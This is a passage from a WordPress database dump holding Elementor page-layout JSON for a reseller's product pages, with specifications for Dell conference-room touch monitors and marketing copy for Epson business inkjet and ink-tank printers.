center;\\\">C5519Q<\\/h2>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8b359d5\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"051af0d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\">C5518QT<\\/h2>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"da22a76\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a4304b8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\">C7017T<\\/h2>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"44f258e\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"4a78e3d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"132399f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"531c7ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0<\\/p><p><img src=\\\"https:\\/\\/i.dell.com\\/is\\/image\\/DellContent\\/\\/content\\/dam\\/global-site-design\\/product_images\\/peripherals\\/output_devices\\/dell\\/monitors\\/c5519q\\/global_spi\\/monitor-c5519q-campaign-hero-504x350-ng.psd?fmt=jpg\\\" alt=\\\"C5519Q Monitor\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"76134a5\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d51c658\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img src=\\\"https:\\/\\/i.dell.com\\/is\\/image\\/DellContent\\/\\/content\\/dam\\/global-site-design\\/product_images\\/peripherals\\/output_devices\\/dell\\/monitors\\/c_series\\/c5518qt\\/pdp\\/dell-monitor-c5518qt-pdp-03-v2.jpg?fmt=jpg\\\" alt=\\\"Dell Monitor C5518QT\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4560da4\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"19ac253\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0<\\/p><p><img src=\\\"https:\\/\\/i.dell.com\\/is\\/image\\/DellContent\\/\\/content\\/dam\\/global-site-design\\/product_images\\/peripherals\\/output_devices\\/dell\\/monitors\\/c_series\\/c7017t\\/global_spi\\/dell-monitor-c7017t-black-right-usage-hero-504x350-ng.psd?fmt=png-alpha\\\" alt=\\\"Dell 70 (C7017t) Conference Room Monitor\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"df69254\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"7110fc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"38f6a9a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: right;\\\"><strong>Resolution<\\/strong><br \\/><strong>OptiPlex Micro Mounting via<\\/strong><br \\/><strong>Touch\\/Non-Touch<\\/strong><br \\/><strong>Image Size<\\/strong><br \\/><strong>Panel Type<\\/strong><br \\/><strong>Surface<\\/strong><br \\/><strong>Mount<\\/strong><br \\/><strong>Connectivity<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bc54c67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0e720c0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>4K<br \\/>Optional bracket<br \\/>Non-touch<br \\/>54.6 in<br \\/>Vertical Alignment Glass<br \\/>Anti-glare<br \\/>Optional wall mount<br \\/>2x HDMI<br \\/>1x DisplayPort<br \\/>1x VGA<br \\/>4x USB<br \\/>1x Audio-In\\/-Out<br \\/>1x RS232<br \\/>1x RJ45<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"496feb0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"3b3a4fe\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>4K<br \\/>PC slot<br \\/>20 points of touch<br \\/>54.6 in<br \\/>IPS Glass<br \\/>Anti-glare, Anti-smudge<br \\/>Optional wall mount<br \\/>3x HDMI<br \\/>1x DisplayPort<br \\/>1x VGA<br \\/>7x USB<br \\/>1x Audio-In\\/-Out<br \\/>1x RS232<br \\/>1x RJ45<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"32d0318\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"2186554\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Full HD<br \\/>Optional bracket<br \\/>10 points of touch<br \\/>69.5 in<br \\/>Vertical Alignment Glass<br \\/>Anti-glare, Anti-smudge<br \\/>Wall mount included<br \\/>3x HDMI<br \\/>1x DisplayPort<br \\/>1x VGA<br \\/>4x USB<br \\/>1x Audio-In\\/-Out<br \\/>1x RS232<br \\/>1x RJ45<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a7995cb\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"2e6862a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"3147a86\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: right;\\\"><strong>Mount<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a36ed2f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f952d0d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Optional wall mount<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5dd861a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"17c56c2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Optional wall mount<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a4c7b0b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98647d5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wall mount included<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b54172e\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"a5d7418\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"9a5bdd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8ed1991\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"15\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"566ed8d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"716c03c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"15\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"571af73\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"feb7900\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"15\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6f41ecd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#f2f2f2\"},\"elements\":[{\"id\":\"1593399\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"6add182\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ae25c2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\">C7520QT<\\/h2>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1ea23e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"b917ab9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\">C8618QT<\\/h2>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9debee7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"36275c2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96cecb2\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"40a96dc\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"ed83b27\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"3418f13\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img src=\\\"https:\\/\\/i.dell.com\\/is\\/image\\/DellContent\\/\\/content\\/dam\\/global-site-design\\/product_images\\/peripherals\\/output_devices\\/dell\\/monitors\\/c_series\\/c7520qt\\/global_spi\\/ng\\/monitor-c7520qt-campaign-hero-504x350-ng.png?fmt=jpg\\\" alt=\\\"Dell 75 4K Interactive Touch Monitor: C7520QT\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"60e9977\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"587b761\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img src=\\\"https:\\/\\/i.dell.com\\/is\\/image\\/DellContent\\/\\/content\\/dam\\/global-site-design\\/product_images\\/peripherals\\/output_devices\\/dell\\/monitors\\/c_series\\/c8618qt\\/global_spi\\/monitor-c8618qt-black-right-usage-hero-504x350-ng.psd?fmt=jpg\\\" alt=\\\"Dell-C8618QT-Monitor \\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"360bdc1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8248f1d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e32e6e8\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"190bffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"277c65b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: right;\\\"><strong>Resolution<\\/strong><br \\/><strong>OptiPlex Micro Mounting via<\\/strong><br \\/><strong>Touch\\/Non-Touch<\\/strong><br \\/><strong>Image Size<\\/strong><br \\/><strong>Panel Type<\\/strong><br \\/><strong>Surface<\\/strong><br \\/><strong>Mount<\\/strong><br \\/><strong>Connectivity<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"73a6ea9\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"59088a1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>4K<br \\/>PC slot<br \\/>20 points of touch<br \\/>75 in<br \\/>IPS Glass<br \\/>Anti-glare, Anti-smudge<br \\/>Optional wall mount<br \\/>3x HDMI<br \\/>1x DisplayPort<br \\/>1x VGA<br \\/>4x USB<br \\/>1x Audio-In\\/-Out<br \\/>1x RS232<br \\/>1x RJ45<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34c2543\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f5d29f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>4K<br \\/>PC slot<br \\/>20 points of touch<br \\/>85.6 in<br \\/>IPS Glass<br \\/>Anti-glare, Anti-smudge<br \\/>Optional wall mount<br \\/>4x HDMI<br \\/>1x DisplayPort<br \\/>1x VGA<br \\/>7x USB<br \\/>1x Audio-In\\/-Out<br \\/>1x RS232<br \\/>1x RJ45<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d69a802\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"82bae14\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9ab178a\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"7df1615\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fb249a3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: right;\\\"><strong>Mount<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1702232\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"501ba37\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Optional wall mount<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"47c9900\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"aa4df57\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Optional wall mount<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2fc8b78\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ca71f29\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b8e407f\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"cc014f5\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"ac0433b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4de9045\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"15\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"39f02db\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6deb4e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"15\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6f2ef27\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"347f8a6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7835,3463,'_wp_page_template','template-fullwidth.php'),(7836,3463,'_elementor_edit_mode','builder'),(7837,3463,'_elementor_template_type','post'),(7838,3463,'_elementor_data','[{\"id\":\"0bcf275\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"829ac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2449815\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.<\\/p><h2>Printers for Work<\\/h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2698f52\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"93fa1d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f872ca9\",\"elType\":\"widget\",\"settings\":{\"title\":\"BUSINESS INKJET PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a74bb0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"245ffff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12a92f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Enterprise WF-C17590\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2417\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Enterprise-WF-C17590.jpg\\\" alt=\\\"\\\" width=\\\"366\\\" height=\\\"207\\\" \\/><\\/p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCore\\u2122, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.<\\/p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax<\\/li><li>Ink: DURABrite<sup>TM<\\/sup>\\u00a0Pro pigment ink cartridges<\\/li><li>ISO Print Speed: 75 ISO ppm (black\\/colour) simplex\\/duplex<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d99a531\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"51d6ae3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3a12efc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ffeb9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Pro WF-C5290\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2418\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Pro-WF-C5290.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.<\\/p><ul><li>High yield ink packs<\\/li><li>High-speed auto-duplex printing<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Epson Connect<\\/li><li>Energy\\u00a0saving<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f78e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"94b61d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b740aaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-100\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2419\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-100.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.<\\/p><ul><li>Print speed up to 14 ppm<\\/li><li>Epson Connect<\\/li><li>1.44 Colour LCD Panel<\\/li><li>Wi-Fi and Wi-Fi Direct connectivity<\\/li><li>Built-in battery<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"96730a6\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":49,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"addc0f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2b0e3f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"e754d94\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fc3866b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-7711<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2420 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-7711.png\\\" alt=\\\"\\\" width=\\\"304\\\" height=\\\"172\\\" \\/><br>\\n\\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM<\\/sup>\\u00a0technology, fast printing speed consistently delivers success in every detail.\\n<ul>\\n \\t<li>Print speeds up to 18ipm for black and 10ipm for colour<\\/li>\\n \\t<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li>\\n \\t<li>Duplex printing up to A3 size<\\/li>\\n \\t<li>Epson DURABrite<sup>TM<\\/sup>\\u00a0Ultra ink<\\/li>\\n \\t<li>4.3\\u201d Colour LCD Touch Panel<\\/li>\\n \\t<li>Print, Scan, Copy Fax with ADF<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5178d20\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b031280\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3a013d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f2b7b04\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c71ec36\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"732a1a6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INK TANK SYSTEM\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e709cb3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"60cd262\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97d2102\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EcoTank L3150<\\/strong><\\/h4><p><img class=\\\"wp-image-2421 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EcoTank-L3150-.jpg\\\" alt=\\\"\\\" width=\\\"311\\\" height=\\\"175\\\" \\/><\\/p><p>Save more with Epson\\u2019s economical and multifunctional printing solutions for business\\u2014the EcoTank L3150\\u2014built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High yield ink bottles<\\/li><li>Spill-free, error-free refilling<\\/li><li>Wi-Fi, Wi-Fi Direct<\\/li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)<\\/li><li>Borderless printing up to 4R<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"63366b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8449cce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L120 Printer\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2422\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L120-Printer.png\\\" alt=\\\"\\\" width=\\\"301\\\" height=\\\"170\\\" \\/><\\/h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.<\\/p><ul><li>High-yield ink bottles<\\/li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color<\\/li><li>Compact Size<\\/li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9109035\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":164,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"140f583\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7d56d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a539e2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson M1100 Printer<\\/strong><\\/h4><p><img class=\\\"wp-image-2423 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-M1100-Printer-.png\\\" alt=\\\"\\\" width=\\\"315\\\" height=\\\"178\\\" \\/><\\/p><p>Efficiency\\u00a0meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pages\\u00a0each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High-yield pigment ink bottle<\\/li><li>Spill-free, error-free refilling<\\/li><li>Print speed up to 32ppm (15ipm)<\\/li><li>4 years warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e74569a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"e157d4e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton 